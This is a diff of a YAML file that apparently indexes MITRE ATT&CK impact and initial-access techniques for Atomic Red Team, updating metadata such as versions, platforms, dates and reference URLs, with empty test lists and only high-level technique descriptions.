         service, but such response time typically requires very aggressive monitoring
@@ -58978,16 +59877,52 @@ impact:
         may be small and the indicator of an event availability of the network or
         service drops. The analysis tools mentioned can then be used to determine
         the type of DoS causing the outage and help with remediation.'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
+      - Containers
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Sensor Health: Host Status'
       x_mitre_impact_type:
       - Availability
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -59055,11 +59990,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -59077,7 +60011,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -59104,7 +60038,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -59154,13 +60088,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests: []
   T1561.001:
@@ -59228,11 +60161,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -59297,13 +60229,12 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests: []
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -59381,7 +60312,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests: []
   T1195.001:
@@ -59431,11 +60361,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59474,10 +60403,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -59494,7 +60423,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -59533,12 +60462,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests: []
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -59600,7 +60528,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -59617,7 +60545,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests: []
   T1195.003:
@@ -59647,7 +60574,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -59661,7 +60588,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -59724,12 +60650,11 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -59804,7 +60729,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -59818,19 +60743,18 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests: []
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -59856,7 +60780,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -59911,7 +60835,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -59974,11 +60897,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -59993,6 +60915,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -60001,18 +60924,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -60044,14 +60967,11 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -60062,6 +60982,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -60070,22 +60995,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -60110,36 +61031,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -60168,9 +61072,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -60188,7 +61092,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -60226,11 +61134,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -60247,7 +61154,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -60257,7 +61163,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -60266,19 +61172,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -60326,11 +61230,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -60350,10 +61255,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -60386,7 +61289,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -60425,7 +61327,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -60440,7 +61342,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -60520,11 +61421,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -60580,11 +61480,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -60645,8 +61544,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
